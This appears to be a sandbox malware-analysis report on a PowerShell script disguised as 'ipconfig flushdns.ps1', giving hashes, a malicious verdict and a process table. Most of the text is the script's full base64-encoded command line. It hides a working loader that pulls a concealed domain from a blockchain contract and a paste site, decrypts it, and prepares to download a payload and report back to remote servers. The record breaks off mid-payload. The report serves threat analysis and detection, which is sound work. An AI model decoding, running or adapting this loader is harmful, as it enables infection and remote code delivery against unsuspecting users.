| File name: | ipconfig flushdns.ps1 |
| Full analysis: | https://app.any.run/tasks/dd630652-6852-44ef-96c8-7ea02c751a48 |
| Verdict: | Malicious activity |
| Analysis date: | June 13, 2024, 10:57:32 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (5338), with CRLF line terminators |
| MD5: | AF02030C000D14EF96B9C90C2DE64AA1 |
| SHA1: | 510B53E4D916E52E3BA4D098C77A1BBBCFE6B791 |
| SHA256: | A45FDFFFE831B4245EC8876D7E85CC8D2ED54693115381B26F5385716E72F91E |
| SSDEEP: | 96:XnPSG1jM0o+AmV1g63pK2x1VXL/Rsi3lXQH7IJuYqF8qar+I4XPpefmHcytYqtCS:3PSGhMtbmVOl8Ci1AH7z5KSI6Skt57Mg |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1440 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2108 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JAAwADgAdABmAHAAUwBLAFoARQBqAG0AbABrADMAQQBoADkAZABYAFAATwBRAFcAeAA2AFQARgBuAEsAMwBJAE4AZgBUADEAMQAzAFEAcgBjAHQAdwBUAEwAUQBzAFQAVwBKAFMASgBSAGkAVABuAHAANABVAE4AOQAxAEIAZwA3ADYAeQBBAEsAMQBPAFcAdwBYADkARQBhAGMAcgB6AHoATwBoADkAeQA0ADEAegBkAFYAQgBjAGMAUQBRAEUAZQBQAHIATwB4AFkAdgBRAG8AWABFAEsAMABFADAAcQBBAHUAZgB5AGMAaABMAFkAVABnAFEAZQA1AG4AQwBHAE4AYQBvAGcARwBHAEwATwBQAGUAbwA0ADkAWAB6AEgAMgAzAGwAegBtAHcAQwBLAFMAQQBOAHYAMABnAG8AcABXAFoAdwBGAE4ATwBHAHkAbQBMAHAAMgBWAGkARgBjAEwARwBaAGYAaABHAE4ANgBqAEUAbQBiAGEAWABmAHQAdgBEAGEAVQB4AGYAbQAzAGMAcwBrAHMAOAB1AHYASgBrAHcARQBHAEcAWgBJAFcAWABLAGYANABwAHoAeAB1AG8AQgAwAEwANwBJAHcAZQBQAG8AWgBJAGMAWgBLAFoAUQAxAEoAUwB6AHkARgAwAEYAcABVAEMAWQB3AHMAUgB2AE0AdQB2AE4AYgB2AEcASABvAE8AUAB5AEQAagBwAHUAcQA0AEIANgBRAEcAbQAxAHEAbQBrAEkAWgAwAFQAUwBrAG0AcgBoAEIAaAA4AG0AbQBCAHQAOQBCAHcAZABNAFkAbwBNAEkAZgBSAEoANgBUAGUAOQBxAHYAUwBWAHgASAByAG0ARgBkAEoAWABCADQAZwA0ADUAZwBjAE0AYQA4ADEAUQBQAGgAdgBUAEsAaABTAFEAUQBvAFIAVQBjAG0AUgBQAEQATAB6ADMAQgA2ADMAdAA5AEsASAB1AG8AaQBPAFUANgBLAE8ARgA4AEUARAB4AEsAdABtAEIAbwB4ADQAcgBkAEsATgBGAHEAWABiAHAAVwB1AG8ASQBUAEYAWABhAHUAUQBTAFgAawA4ADUAWABsADYAYQBpAG8AOABJAHcANgA0AFkATwBmAEYAQgBHADMAZgB6AHoANQBUADAAbQBYAEkAdABnAGYAcwA0AEEAbwBsAEcAbwBwAFkAegBuAFQAbgBSAEYAVABQAG4AaQBqAGIAYgBZADgAcgBnAHkAUwBsAG8AeABrAHIAUgBLAGUASgBTAGYATABQADAAeQBMAGsAMQBNAFQAZQBtAEcAbQBhADYAagBIAGIAUABBAFAASABkAG8ASgBrAEMAUwBJAFUATgBwAEUAaABTAEMANgBNAGsAOQBrAHIAMgB0ACAAPQAgACIARwBlAHQAQgAiAAoACgAKAAoAJAB1AHcAagA0AHgASgBSAGQAbwBZAEwAeQA0AHUAaABmAFYASgAyADYAaABYAEYAWAA4AEcAUgBZADcAMgBHAGsAYwA1AHYAcgBVADQAcgBqAHIAOABjAGYATABMAFIAegBEAHAAdABXAGcANQBvAHIAVABZAFEAZABRADIAZgBmAG0AMQByADEARwBwAHoAVQBEAEMAbQAyAEoAawB4AEkARwB1AHgAOQBZAGcAQgBoAEgAUwBnAHEAUAB6AEUAaABQAFYAUgA2AHgAbwBoAEQAQgBZAFUASAB1AFoAbQBGAGYAUABiAFAAbABKAFEANgAwAEYAVwB6AGEAUgBxAGcAcwBhAHAAdQBmAEEAWABZAEwAVwBYAEYAegBxAEEAbQBhAG4AVABHAGsAbwAzAFkAMABxAHIAcABvAG8AOQBuAHIAbwAxAEMAdgAzAHQATQBIAEYATwBUAE8ANABnAEQAZQA3ADAASABlADgAMAAwAEgAcABxADkAZwAzADAAeABuAFEASQBlAHUASABHADcAWAAxAFIASgAzAGEARQBHAEMAUgB3AEQARgBvAE4ANgBGAFgARQA2AFoAcwBWAEkAZAB4AGoANABYADUAYwBtAEcAVgBpAFYATgByADYARwA4AGUAVABVADYAcQB4AGgAOQBWAHAAagBWAHYATABkAFIAQgAwAEcARwBDAFEAdgBOAHEARgA4AFUAVQBTADcAQgBiAGIAdQA1AGoAZQBiAEYAWQBIADAANwA3AFEATwBUAHIAVABBAGkAZABHAEUAQQAzADUAYwBhAHEAZgBGAGoAawBmAG8AdwBRAGYAQgB1AHMAegBqAGUAeQBFAGQAWABNAGQAVABQAFgAbwAyAEQAdwBsAFkAegByADYAWgA0AG0ANABuADUAcAA3AGkAbgBUAEUAWQBUAGYASgB0AHgAUwBMAEEASQBmAHUARwBhADQAdwB0AFgASgB3AHgAdwAgAD0AIAAiAHkAdABlAHMAIgAKAAoACgAKACQATgB2AHUARQBQAGQAOQBWAGUAcwBxAGsAZQAzADMAVgBUAGcAdQBRAHIAaAA0ADQANwBrAEcAbABnAGgAcABmAGYAaABTAE4AMAAxADYAVQBXADkAaQBBAGoAaQA5AHcAWQB0AFgAbgBXAEUATABhADAAbgBYAEMAUwBoAHEANwB4AEcAVQA0AGYAWQBIAEQAYwBJAFAAdwB1AGgATQBsADEAZgB2AGMAZwBvAE4AYgB1ADkAOABoAEEAVwBOAGkAdwBnAHoAUQBFADYAYQB4AHgARgBHADkARwA1AGQAbAB0AEcAOQB1AGkAbQB3AHYAOQBsAHoAMQBpAEwANgBXADMASABuAEMAcwBmAHkARwBuAHAAbABRAHEANAByAGUAZABxAEUAdgBmADMAYQBWAE4AeAAwADQATgAwAHMAUQBFAGcAaQBnAGcAVABQAHkARQB3AHEASABiAGYAVwBYAEIAagBxAEsAVQBnAFIAOAB5AE0AYwBvAHEAawBaAHMAVwBrAFQAbwAzADQAeAAwAEIAUwBSAGsAZAB6AFYAcwB3ADUAYQBiAGEANABlADMAbAA5AGIAdABPAFEAWABYAHUAbAAxADUAMgBKAHUAegBBAG0ARgBjAEoAVgByAEIARwBPAFQASwBDADkAZABZAEkAYwB5AGcAUgBxAGoARQA2AHgAdgAxAEkARgBtADkATQBmADcAYgBNAGIAOAB0AFUAMwBWAGMAQwBmAFMAWABQAHUASQBLAHQAagB1ADYAeAB5AG0AawBZAEIAZQBWADYAcQBFAGMARABWAHcAYQAwAFoASwBEAGcASwB0ADYAawBRAHoATwA2AFUAWQBHAGkAaQBHAHkAQQBqADkAQQBTADgAZgBuAEwAWgB5AFgAMQBiADcAegA5AEUAbQA3AHkAYgBiAFgAZQBSADIAaAA3AEoAOAB5ADQAcAB4AGoAWQBvAGkAaABRAEEAcgBqAG8ANQBsAHQATQBNAGQASwBGAHAAQgA5AFMAZAA0AEQAMgA5ADEAUwBtAGQAdQBwAEgAYQBaAEUAUwBTAFYAdQB5AEkAbgAyAEYARABVAHcAQQBOAEkAWQB3ADIAcQBoADMAUQBMAG0AdgBOAFgATABjAFYAeAAxAHcASgB6AG4AZgAgAD0AIAAoACQAMAA4AHQAZgBwAFMASwBaAEUAagBtAGwAawAzAEEAaAA5AGQAWABQAE8AUQBXAHgANgBUAEYAbgBLADMASQBOAGYAVAAxADEAMwBRAHIAYwB0AHcAVABMAFEAcwBUAFcASgBTAEoAUgBpAFQAbgBwADQAVQBOADkAMQBCAGcANwA2AHkAQQBLADEATwBXAHcAWAA5AEUAYQBjAHIAegB6AE8AaAA5AHkANAAxAHoAZABWAEIAYwBjAFEAUQBFAGUAUAByAE8AeABZAHYAUQBvAFgARQBLADAARQAwAHEAQQB1AGYAeQBjAGgATABZAFQAZwBRAGUANQBuAEMARwBOAGEAbwBnAEcARwBMAE8AUABlAG8ANAA5AFgAegBIADIAMwBsAHoAbQB3AEMASwBTAEEATgB2ADAAZwBvAHAAVwBaAHcARgBOAE8ARwB5AG0ATABwADIAVgBpAEYAYwBMAEcAWgBmAGgARwBOADYAagBFAG0AYgBhAFgAZgB0AHYARABhAFUAeABmAG0AMwBjAHMAawBzADgAdQB2AEoAawB3AEUARwBHAFoASQBXAFgASwBmADQAcAB6AHgAdQBvAEIAMABMADcASQB3AGUAUABvAFoASQBjAFoASwBaAFEAMQBKAFMAegB5AEYAMABGAHAAVQBDAFkAdwBzAFIAdgBNAHUAdgBOAGIAdgBHAEgAbwBPAFAAeQBEAGoAcAB1AHEANABCADYAUQBHAG0AMQBxAG0AawBJAFoAMABUAFMAawBtAHIAaABCAGgAOABtAG0AQgB0ADkAQgB3AGQATQBZAG8ATQBJAGYAUgBKADYAVABlADkAcQB2AFMAVgB4AEgAcgBtAEYAZABKAFgAQgA0AGcANAA1AGcAYwBNAGEAOAAxAFEAUABoAHYAVABLAGgAUwBRAFEAbwBSAFUAYwBtAFIAUABEAEwAegAzAEIANgAzAHQAOQBLAEgAdQBvAGkATwBVADYASwBPAEYAOABFAEQAeABLAHQAbQBCAG8AeAA0AHIAZABLAE4ARgBxAFgAYgBwAFcAdQBvAEkAVABGAFgAYQB1AFEAUwBYAGsAOAA1AFgAbAA2AGEAaQBvADgASQB3ADYANABZAE8AZgBGAEIARwAzAGYAegB6ADUAVAAwAG0AWABJAHQAZwBmAHMANABBAG8AbABHAG8AcABZAHoAbgBUAG4AUgBGAFQAUABuAGkAagBiAGIAWQA4AHIAZwB5AFMAbABvAHgAawByAFIASwBlAEoAUwBmAEwAUAAwAHkATABrADEATQBUAGUAbQBHAG0AYQA2AGoASABiAFAAQQBQAEgAZABvAEoAawBDAFMASQBVAE4AcABFAGgAUwBDADYATQBrADkAawByADIAdAAgACsAIAAkAHUAdwBqADQAeABKAFIAZABvAFkATAB5ADQAdQBoAGYAVgBKADIANgBoAFgARgBYADgARwBSAFkANwAyAEcAawBjADUAdgByAFUANAByAGoAcgA4AGMAZgBMAEwAUgB6AEQAcAB0AFcAZwA1AG8AcgBUAFkAUQBkAFEAMgBmAGYAbQAxAHIAMQBHAHAAegBVAEQAQwBtADIASgBrAHgASQBHAHUAeAA5AFkAZwBCAGgASABTAGcAcQBQAHoARQBoAFAAVgBSADYAeABvAGgARABCAFkAVQBIAHUAWgBtAEYAZgBQAGIAUABsAEoAUQA2ADAARgBXAHoAYQBSAHEAZwBzAGEAcAB1AGYAQQBYAFkATABXAFgARgB6AHEAQQBtAGEAbgBUAEcAawBvADMAWQAwAHEAcgBwAG8AbwA5AG4AcgBvADEAQwB2ADMAdABNAEgARgBPAFQATwA0AGcARABlADcAMABIAGUAOAAwADAASABwAHEAOQBnADMAMAB4AG4AUQBJAGUAdQBIAEcANwBYADEAUgBKADMAYQBFAEcAQwBSAHcARABGAG8ATgA2AEYAWABFADYAWgBzAFYASQBkAHgAagA0AFgANQBjAG0ARwBWAGkAVgBOAHIANgBHADgAZQBUAFUANgBxAHgAaAA5AFYAcABqAFYAdgBMAGQAUgBCADAARwBHAEMAUQB2AE4AcQBGADgAVQBVAFMANwBCAGIAYgB1ADUAagBlAGIARgBZAEgAMAA3ADcAUQBPAFQAcgBUAEEAaQBkAEcARQBBADMANQBjAGEAcQBmAEYAagBrAGYAbwB3AFEAZgBCAHUAcwB6AGoAZQB5AEUAZABYAE0AZABUAFAAWABvADIARAB3AGwAWQB6AHIANgBaADQAbQA0AG4ANQBwADcAaQBuAFQARQBZAFQAZgBKAHQAeABTAEwAQQBJAGYAdQBHAGEANAB3AHQAWABKAHcAeAB3ACkACgAKACQAdQBSAEkAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYgBzAGMALQBkAGEAdABhAHMAZQBlAGQAMQAuAGIAaQBuAGEAbgBjAGUALgBvAHIAZwAvACIACgAKACQAUABBAFkAbABPAGEARAAgAD0AIABAAHsACgAKACAAIAAgACAAagBzAG8AbgByAHAAYwAgAD0AIAAiADIALgAwACIACgAKACAAbQBlAHQAaABvAGQAIAA9ACAAIgBlAHQAaABfAGMAYQBsAGwAIgAKAAoAIABwAGEAcgBhAG0AcwAgAD0AIABAACgACgAKACAAIAAgACAAIABAAHsACgAKACAAdABvACAAPQAgACIAMAB4AEMAMQAyAGQAMABjAEEANgA1AGIAOABiAEMAOAA3ADIANgA1AGIAMwAzAEMAMQAzAEIAYQBiADQANwA5AGUANQBEADkAMQBjAGMAMAA4AGUAIgAKAAoAZABhAHQAYQAgAD0AIAAiADAAeABjADIAZgBiADIANgBhADYAIgAKAAoAIAAgACAAIAB9ACwACgAKACAAIAAgACAAIAAgACAAIAAgACIAbABhAHQAZQBzAHQAIgAKAAoAIAAgACAAKQAKAAoAIAAgACAAIABpAGQAIAA9ACAANAA0AAoACgB9AAoACgAkAGoAUwBPAE4AUABhAHkATABPAGEAZAAgAD0AIAAkAFAAQQBZAGwATwBhAEQAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuAAoACgAkAFIARQBTAHAAbwBOAFMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJAB1AFIASQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJABqAFMATwBOAFAAYQB5AEwATwBhAGQAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiAAoACgBpAGYAIAAoACQAUgBFAFMAcABvAE4AUwBlAC4AUABTAE8AYgBqAGUAYwB0AC4AUAByAG8AcABlAHIAdABpAGUAcwAuAE4AYQBtAGUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACcAcgBlAHMAdQBsAHQAJwApACAAewAKAAoAIAAgAHIAZQB0AHUAcgBuAAoACgB9AAoACgAkAHIAZQBzAFUAbABUACAAPQAgACQAUgBFAFMAcABvAE4AUwBlAC4AcgBlAHMAdQBsAHQACgAKAGkAZgAgACgAJAByAGUAcwBVAGwAVAAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAiADAAeAAiACkAKQAgAHsACgAKACAAIAAgACAAIAAkAHIAZQBzAFUAbABUACAAPQAgACQAcgBlAHMAVQBsAFQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADIAKQAKAAoAfQAKAAoAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAcgBlAHMAVQBsAFQALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkACgAKAGYAbwByACAAKAAkAEkAIAA9ACAAMAA7ACAAJABJACAALQBsAHQAIAAkAHIAZQBzAFUAbABUAC4ATABlAG4AZwB0AGgAOwAgACQASQAgACsAPQAgADIAKQAgAHsACgAKACAAIAAgACAAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAWwAkAEkAIAAvACAAMgBdACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAcgBlAHMAVQBsAFQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQASQAsACAAMgApACwAIAAxADYAKQAKAAoAfQAKAAoAJABBAFMAYwBJAEkAXwBUAGUAeAB0ACAAPQAgAFsAUwBZAHMAVABFAG0ALgB0AGUAeAB0AC4AZQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAKQAKAAoAJABwAEEAcgB0AHMAIAA9ACAAQAAoACQAQQBTAGMASQBJAF8AVABlAHgAdAAgAC0AcwBwAGwAaQB0ACAAIgBgADAAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAKACAAIAAgACAAaQBmACAAKAAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMQApACAAewAgACQAXwAuAFMAdQBiAHMAdAByAGkAbgBnACgAMQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABfACAAfQAKAAoAfQAKAAoAJABEAE8AbQBhAGkAbgAgAD0AIAAoAC0AagBvAGkAbgAgACQAcABBAHIAdABzACkALgBUAHIAaQBtAFMAdABhAHIAdAAoACkACgAKAGkAZgAgACgALQBuAG8AdAAgACQARABPAG0AYQBpAG4AKQAgAHsACgAKACAAIAAgACAAcgBlAHQAdQByAG4ACgAKAH0ACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABIAGUAeABTAHQAcgBpAG4AZwBgAFQAbwBCAHkAdABlAEEAcgByAGEAeQAoACQASABlAHgAUwB0AHIASQBuAEcAKQAgAHsACgAKACAAIAAgACAAJABCAHkAdABFAFMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQBUAGUAWwBdACAAKAAkAEgAZQB4AFMAdAByAEkAbgBHAC4ATABlAG4AZwB0AGgAIAAvACAAMgApAAoACgBmAG8AcgAgACgAJABJACAAPQAgADAAOwAgACQASQAgAC0AbAB0ACAAJABCAHkAdABFAFMALgBMAGUAbgBnAHQAaAA7ACAAJABJACsAKwApACAAewAKAAoAIAAgACAAIAAkAEIAeQB0AEUAUwBbACQASQBdACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQASABlAHgAUwB0AHIASQBuAEcALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQASQAgACoAIAAyACwAIAAyACkALAAgADEANgApAAoACgAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAEIAeQB0AEUAUwAKAAoAfQAKAAoACgAKACQAYQAxAGIAMgBDADMAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBjAG8ALwB0ADUAMgA2ADYAcQAzAHAALwByAGEAdwAiAAoACgAkAFgAOQB5ADgAegA3ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAGEAMQBiADIAQwAzACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAAoAJABJAFYAQwBPAE4AdABFAG4AdAAgAD0AIAAkAFgAOQB5ADgAegA3AC4AQwBvAG4AdABlAG4AdAAuAFQAcgBpAG0AKAApAAoACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAagBUAHkAYABIAEIASwBrAHUAawBqAGsAYABoAGQAQQBkAEMAeQBSAGAAQQBxAFYAYABVAEoAdgBgAFgAdQB2AFoAYABqAGMAZQBwAGcAYABJAGYATwB4AGAAegBhAGYAIAB7AAoACgBwAGEAcgBhAG0AIAAoAAoACgAgACAAWwBzAHQAcgBpAG4AZwBdACQARQBOAGMAUgB5AFAAVABlAEQAVABFAFgAVAAsAAoACgAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAawBFAFkALAAKAAoAIAAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQASQBuAGkAVABJAGEATABpAFoAQQBUAGkAbwBOAHYARQBDAHQAbwByAAoACgAgACAAKQAKAAoAIAAgACAAIAAkAFUAVABGADgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFUAVABGADgARQBuAGMAbwBkAGkAbgBnAAoACgAgACAAIAAkAEMASQBwAGgAZQByAGIAeQB0AEUAUwAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARQBOAGMAUgB5AFAAVABlAEQAVABFAFgAVAApAAoACgAgACAAIAAgACAAIAAgACQAQQBFAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBNAGEAbgBhAGcAZQBkAAoACgAkAEEARQBzAC4ATQBvAGQAZQAgAD0AIABbAHMAWQBzAHQARQBNAC4AUwBFAEMAdQBSAGkAVAB5AC4AQwByAFkAUAB0AE8ARwBSAEEAUABIAHkALgBDAEkAUABIAGUAUgBtAE8AZABlAF0AOgA6AEMAQgBDAAoACgAgACAAIAAgACQAQQBFAHMALgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwBZAHMAdABlAE0ALgBzAGUAQwB1AFIAaQBUAFkALgBDAHIAeQBwAFQATwBHAHIAYQBwAEgAWQAuAFAAQQBEAEQASQBuAEcATQBPAEQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAJABBAEUAcwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMQAyADgACgAKACAAJABBAEUAcwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4AAoACgAgACAAJABBAEUAcwAuAEsAZQB5ACAAPQAgACQAVQBUAEYAOAAuACQATgB2AHUARQBQAGQAOQBWAGUAcwBxAGsAZQAzADMAVgBUAGcAdQBRAHIAaAA0ADQANwBrAEcAbABnAGgAcABmAGYAaABTAE4AMAAxADYAVQBXADkAaQBBAGoAaQA5AHcAWQB0AFgAbgBXAEUATABhADAAbgBYAEMAUwBoAHEANwB4AEcAVQA0AGYAWQBIAEQAYwBJAFAAdwB1AGgATQBsADEAZgB2AGMAZwBvAE4AYgB1ADkAOABoAEEAVwBOAGkAdwBnAHoAUQBFADYAYQB4AHgARgBHADkARwA1AGQAbAB0AEcAOQB1AGkAbQB3AHYAOQBsAHoAMQBpAEwANgBXADMASABuAEMAcwBmAHkARwBuAHAAbABRAHEANAByAGUAZABxAEUAdgBmADMAYQBWAE4AeAAwADQATgAwAHMAUQBFAGcAaQBnAGcAVABQAHkARQB3AHEASABiAGYAVwBYAEIAagBxAEsAVQBnAFIAOAB5AE0AYwBvAHEAawBaAHMAVwBrAFQAbwAzADQAeAAwAEIAUwBSAGsAZAB6AFYAcwB3ADUAYQBiAGEANABlADMAbAA5AGIAdABPAFEAWABYAHUAbAAxADUAMgBKAHUAegBBAG0ARgBjAEoAVgByAEIARwBPAFQASwBDADkAZABZAEkAYwB5AGcAUgBxAGoARQA2AHgAdgAxAEkARgBtADkATQBmADcAYgBNAGIAOAB0AFUAMwBWAGMAQwBmAFMAWABQAHUASQBLAHQAagB1ADYAeAB5AG0AawBZAEIAZQBWADYAcQBFAGMARABWAHcAYQAwAFoASwBEAGcASwB0ADYAawBRAHoATwA2AFUAWQBHAGkAaQBHAHkAQQBqADkAQQBTADgAZgBuAEwAWgB5AFgAMQBiADcAegA5AEUAbQA3AHkAYgBiAFgAZQBSADIAaAA3AEoAOAB5ADQAcAB4AGoAWQBvAGkAaABRAEEAcgBqAG8ANQBsAHQATQBNAGQASwBGAHAAQgA5AFMAZAA0AEQAMgA5ADEAUwBtAGQAdQBwAEgAYQBaAEUAUwBTAFYAdQB5AEkAbgAyAEYARABVAHcAQQBOAEkAWQB3ADIAcQBoADMAUQBMAG0AdgBOAFgATABjAFYAeAAxAHcASgB6AG4AZgAoACQAawBFAFkAKQAKAAoAIAAkAEEARQBzAC4ASQBWACAAPQAgAEgAZQB4AFMAdAByAGkAbgBnAFQAbwBCAHkAdABlAEEAcgByAGEAeQAoACQASQBuAGkAVABJAGEATABpAFoAQQBUAGkAbwBOAHYARQBDAHQAbwByACkACgAKACAAIAAgACAAIAAgACAAIAAkAFQAUgBBAE4AUwBmAE8AUgBtACAAPQAgACQAQQBFAHMALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkACgAKACAAIAAgACAAIAAgACQAUABMAEEAaQBuAEIAeQBUAGUAUwAgAD0AIAAkAFQAUgBBAE4AUwBmAE8AUgBtAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAQwBJAHAAaABlAHIAYgB5AHQARQBTACwAIAAwACwAIAAkAEMASQBwAGgAZQByAGIAeQB0AEUAUwAuAEwAZQBuAGcAdABoACkACgAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAUABMAEEAaQBuAEIAeQBUAGUAUwApAAoACgB9AAoACgAKAAoAJABLAGUAWQAgAD0AIABbAFMAWQBzAFQARQBtAC4AdABlAHgAdAAuAGUAbgBjAG8AZABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBTAFQARQBNAC4AYwBPAE4AdgBlAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBTAGoAVgBRAFIAVwBJADIAVwBFAHAAbQBiAFgAbABMAFYAWABGADIATgB3AD0APQAiACkAKQAKAAoAJABJAFYAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBOAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAUwBUAEUATQAuAGMATwBOAHYAZQBSAFQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASQBWAEMATwBOAHQARQBuAHQAKQApAAoACgAkAEQAYwBTADEAIAA9ACAAagBUAHkASABCAEsAawB1AGsAagBrAGgAZABBAGQAQwB5AFIAQQBxAFYAVQBKAHYAWAB1AHYAWgBqAGMAZQBwAGcASQBmAE8AeAB6AGEAZgAgAC0ARQBuAGMAcgB5AHAAdABlAGQAVABlAHgAdAAgACQARABPAG0AYQBpAG4AIAAtAEsAZQB5ACAAJABLAGUAWQAgAC0ASQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAFYAZQBjAHQAbwByACAAJABJAFYACgAKAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAgAD0AIAB7AAoACgAgACAAcABhAHIAYQBtACAAKAAkAEcAYwBzADEAKQAKAAoAIAAgACAAIAAgACAAJAB1AHIAbAAxACAAPQAgACIAaAB0AHQAcABzADoALwAvACQARABjAFMAMQAvAGQAZgAvAGQAYQB0AGEALgB6AGkAcAAiAAoACgAgACAAIAAgACAAIAAgACQAdQByAEwAMgAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwByAHMAbQBiAHMAYwBtAC4AJABEAGMAUwAxAC8AcABvAHMAdAAuAHAAaABwAD8AcwB0AGEAdAB1AHMAPQAyACIACgAKACAAIAAgACAAJAB1AFIAbAAzACAAPQAgACIAaAB0AHQAcABzADoALwAvAHIAcwBtAGIAcwBjAG0ALgAkAEQAYwBTADEALwBwAG8AcwB0AC4AcABoAHAAPwBzAHQAYQB0AHUAcwA9ADMAIgAKAAoAUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AaQBtAHUAbQAgADMAMQAwADAAIAAtAE0AYQB4AGkAbQB1AG0AIAA1ADEAMAAwACkACgAKACAAWwBuAEUAVAAuAHMAZQByAHYASQBjAEUAUABvAEkAbgB0AG0AQQBuAGEAZwBFAFIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQBUAC4AUwBFAEMAdQBSAEkAdABZAHAAUgBvAHQAbwBDAE8ATAB0AFkAUABFAF0AOgA6AFQAbABzADEAMgAKAAoAIAAgACAAIAAgACQATQBpAG4AbABlAG4ARwBUAGgAIAA9ACAAOAAKAAoAIAAgACAAIAAgACAAIAAgACQAbQBBAFgATABFAE4ARwB0AEgAIAA9ACAAMQA1AAoACgAgACAAIAAgACAAIAAgACQATgBBAG0AZQBMAGUATgBnAHQASAAgAD0AIABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGkAbgBpAG0AdQBtACAAJABNAGkAbgBsAGUAbgBHAFQAaAAgAC0ATQBhAHgAaQBtAHUAbQAgACgAJABtAEEAWABMAEUATgBHAHQASAAgACsAIAAxACkACgAKACAAIAAgACAAIAAgACAAJABDAGgAQQByAFMAIAA9ACAAJwBhAGIAYwBkAGUAZgBnAGgAaQBqAGsAbABtAG4AbwBwAHEAcgBzAHQAdQB2AHcAeAB5AHoAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABRAFIAUwBUAFUAVgBXAFgAWQBaADAAMQAyADMANAA1ADYANwA4ADkAJwAKAAoAIAAgACAAIAAgACAAIAAgACQARABJAFIAbgBhAE0AZQAgAD0AIAAtAGoAbwBpAG4AIAAoADEALgAuACQATgBBAG0AZQBMAGUATgBnAHQASAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB